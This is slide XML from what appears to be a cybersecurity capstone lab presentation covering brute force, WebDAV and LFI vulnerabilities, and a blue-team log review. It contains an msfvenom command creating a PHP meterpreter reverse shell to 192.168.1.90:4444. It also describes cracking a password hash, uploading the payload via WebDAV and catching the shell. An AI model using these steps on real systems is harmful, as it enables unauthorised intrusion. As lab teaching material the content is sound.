              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1100" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1122" name="Google Shape;1122;p62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888652"/>
            <a:ext cx="533372" cy="533481"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695452"/>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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6390855" y="1475666"/>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lang="en-AU" sz="1200" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A5DB859-649F-4BA9-D701-17F67C50FC05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2651034" y="4849698"/>
            <a:ext cx="6350000" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC1D730D-2297-8398-591D-7D502AAFD2E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6076008" y="1489078"/>
            <a:ext cx="2894076" cy="286156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24F65836-05A1-76AA-1C3F-EF128E142657}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6122726" y="1810919"/>
            <a:ext cx="2907757" cy="21923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Brute-force Attack</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1111" name="Google Shape;1111;p62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142966" y="4758601"/>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sz="2000" b="1" dirty="0"/>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449EBD0-2D91-F385-5A4E-101356E1B2D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4506044" y="1498973"/>
            <a:ext cx="4573680" cy="3194947"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{346BCEBD-CBA5-4343-10F1-53B6A3229265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="68131" y="1498973"/>
            <a:ext cx="4352451" cy="3259628"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2900735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Reverse Shell Backdoor CVE-2019-13386</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p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Created and uploaded ~# msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.1.90</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>lport=4444 –o shell.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1100" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Executed reverse shell backdoor on Capstone Apache server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1100" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>eterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>&gt;shell&gt;find / -name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>flag.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> &gt; /dev/null &gt; cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>flag.txt</a:t>
            </a:r>
            <a:endParaRPr sz="11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100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Create a reverse shell payload and move it to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ebDAV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> server as Ryan.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1100" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Listen to the host and port.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1100" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Once the payload is executed, the attacker can listen to the Capstone server – 192.168.1.105</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1100" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Flag file was discovered and the result of the text is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>b1ng0w@5h1sn@m0</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4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A92F90C-9AA8-89D3-DBFA-9987EA5ADD34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4082869" y="4446047"/>
            <a:ext cx="1117600" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BD01A77-3794-7976-C190-8C20EE8A1FBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6033653" y="1480575"/>
            <a:ext cx="3072200" cy="387696"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65C3AA75-CF2E-D53C-1D41-7B42383525EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6010249" y="1886494"/>
            <a:ext cx="3095604" cy="2782565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="585160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24600" y="-132583"/>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Local File Inclusion (LFI) or Remote File Inclusion (RFI) CVE-2021-31783</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I used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> to deliver a payload onto the vulnerable machine (the Capstone server/192.168.1.105)</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Using the multi/handler exploit I could get access to the machine’s shell.</a:t>
            </a:r>
            <a:endParaRPr sz="12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B33D877A-7A58-1A29-D521-C6F48DE6A84B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6067460" y="1463182"/>
            <a:ext cx="3038929" cy="2594208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E55A7633-A412-E6CD-832F-353B9DC427BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6067459" y="3867179"/>
            <a:ext cx="3038929" cy="5855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WebDAV Vulnerability</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A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> reverse shell payload was created using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>. Using crackstation.net, Ryan’s password hash was cracked revealing his password. Kali File Manager was used to drag and drop the payload onto the victim web server by using Ryan’s credentials and the WebDAV protocol. </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 sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Ability to establish a reverse shell after uploading and opening the php payload on the victim system. The payload is set on port 4444. Using Metasploit, the php reverse shell exploit was used to allow remote connection to the web server and explore folders, including the root folder.</a:t>
            </a:r>
            <a:endParaRPr sz="12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A7F0E9BD-17E0-FC1E-57E2-7FCFE2BC6BEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6738391" y="1177275"/>
            <a:ext cx="1981614" cy="1688042"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C492BA31-B09C-0D89-2216-C4FAC003B5AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6531272" y="2945056"/>
            <a:ext cx="2012550" cy="1718372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="465351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0" name="Google Shape;1160;p65"/>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 </a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200"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latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1163" name="Google Shape;1163;p65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="227172" y="562455"/>
            <a:ext cx="49110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100" dirty="0"/>
              <a:t>The port scan occurs at 26 April 2022 at 09:15.</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1100" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t>here are 203439 hits and it is from the source IP, which is 192.168.1.90. </a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t>The file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0" err="1"/>
              <a:t>connect_to_crop_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0"/>
              <a:t> was requested and returned.</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1164" name="Google Shape;1164;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="315074" y="845138"/>
            <a:ext cx="424701" cy="331225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
